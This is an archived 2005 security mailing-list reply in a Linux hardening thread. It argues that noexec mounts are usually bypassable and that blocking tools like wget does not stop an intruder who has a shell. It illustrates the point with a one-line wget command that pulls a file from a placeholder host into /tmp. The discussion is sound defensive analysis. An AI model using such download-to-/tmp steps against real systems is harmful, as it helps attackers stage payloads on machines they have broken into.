Re: Re[4]: Linux hardening
From: Adam D. Barratt (security-focus-linux_at_funky-badger.org)
Date: 08/30/05
- Previous message: Ulisses Reina Montenegro: "Re: Linux hardening"
- In reply to: Kir: "Re[4]: Linux hardening"
- Next in thread: Sean Finkel: "Re: Linux hardening"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: Kir <kir_daemon@front.ru> Date: Tue, 30 Aug 2005 19:35:02 +0100
On Tue, 2005-08-30 at 09:51 +0400, Kir wrote:
> > What do you mean? Curl prints to STDOUT. If someone manages to exec a
> > shell, couldn't he just redirect the curl output to /tmp as he desires?
>
> > Anyway, it seems to me it'd be more effective to make sure he cannot
> > execute whatever it is he downloaded; the noexec flag and GRSec's TPE
> > would probably both be useful for that.
noexec is almost always bypassable.
> > Or did I misunderstand you?
>
> You misunderstood. Method above was meant to be used with
> wget, that dumps received file into file.
Exactly the same applies:
wget http://some.host/path -O - > /tmp/foo
Cheers,
Adam
- Previous message: Ulisses Reina Montenegro: "Re: Linux hardening"
- In reply to: Kir: "Re[4]: Linux hardening"
- Next in thread: Sean Finkel: "Re: Linux hardening"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
